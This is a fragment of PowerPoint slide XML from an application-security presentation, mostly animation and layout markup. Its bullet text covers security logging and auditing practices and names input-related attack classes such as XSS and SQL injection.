                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="582">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="14" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="582">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="582">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="582">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58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582">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="582">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="582">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58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Class="entr" nodeType="clickEffect" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="582">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="582">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="34" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="582">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="582">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582" grpId="1"/>
    </p:bldLst>
  </p:timing>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8" name="Logging"/>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Logging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1289" name="Application Security is more then setting up perimeter defense…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>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Application Security is more then setting up perimeter defense</a:t>
            </a:r>
          </a:p>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Keep a log trail of authentication attempts</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Both successful and failed</a:t>
            </a:r>
          </a:p>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Keep a log trail of all accesses to assets</a:t>
            </a:r>
          </a:p>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Log as close to an asset as possible</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SQL Server Stored Procedure</a:t>
            </a:r>
          </a:p>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Sometimes… a log trail is the only mitigation</a:t>
            </a:r>
          </a:p>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Identify “who, what, where &amp; when”…</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3" name="What you Log"/>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What you Log</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1294" name="“Fire and Forget” – Asynchronous logging…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>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“Fire and Forget” – Asynchronous logging</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MSMQ</a:t>
            </a:r>
          </a:p>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Don’t write sensitive information in logs</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Passwords</a:t>
            </a:r>
          </a:p>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Identify the (“who, what, where &amp; when”):</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Identity</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Action</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Component/Service/Object/Method</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Timestamp</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8" name="Audit"/>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Audit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1299" name="Logs identify the “who, what, where &amp; when”…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Logs identify the “who, what, where &amp; when”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Audit the logs to determine “why”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Setup a process whereby logs are audited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Monitor &amp; Response Process</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Can be automated to some extent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Log files are an asset!</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1" name="Consequences of Input Issues"/>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Consequences of Input Issues</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1302" name="Lead to a realization of various attack patterns…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Lead to a realization of various attack patterns</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Cross-Site Scripting (XSS)</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One-Click Attacks</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SQL Injection </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Canonicalization issues</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Buffer overflow or arithmetic errors (Memory Management issues)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="690033" indent="-232833" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8DACD0"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Denial of Service</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6" name="Areas of Security Concern"/>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Areas of Security Concern</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1307" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1770097" y="1901048"/>
            <a:ext cx="9821335" cy="6931379"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4034"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B3C8DF"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="4D4D4D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
              <a:srgbClr val="AFAFAF"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1310" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2086186" y="2007164"/>
            <a:ext cx="9261406" cy="891823"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9261404" cy="891822"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1308" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="9261405" cy="891823"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="D5D69C"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EEEFD7"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="13500000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1309" name="Authentication"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10900" y="99963"/>
              <a:ext cx="9239606" cy="691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47" tIns="130047" rIns="130047" bIns="130047" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3000"/>
                <a:t>Authentication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1313" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1442719" y="2124568"/>
            <a:ext cx="557673" cy="650241"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="557671" cy="650240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1311" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="557672" cy="650241"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="000000"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="CECECE"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="000000">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1312" name="1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="108999" y="12445"/>
              <a:ext cx="339673" cy="625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3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1316" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2086186" y="4039164"/>
            <a:ext cx="9261406" cy="819574"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9261404" cy="819573"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1314" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="9261405" cy="819574"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="D5D69C"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EEEFD7"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="13500000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1315" name="Asset Handling"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="63838"/>
              <a:ext cx="9241372" cy="691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47" tIns="130047" rIns="130047" bIns="130047" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3000"/>
                <a:t>Asset Handling</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1319" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1442719" y="4124959"/>
            <a:ext cx="557673" cy="650241"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="557671" cy="650240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1317" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="557672" cy="650241"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="000000"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="CECECE"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="000000">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1318" name="3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="108999" y="12445"/>
              <a:ext cx="339673" cy="625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3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
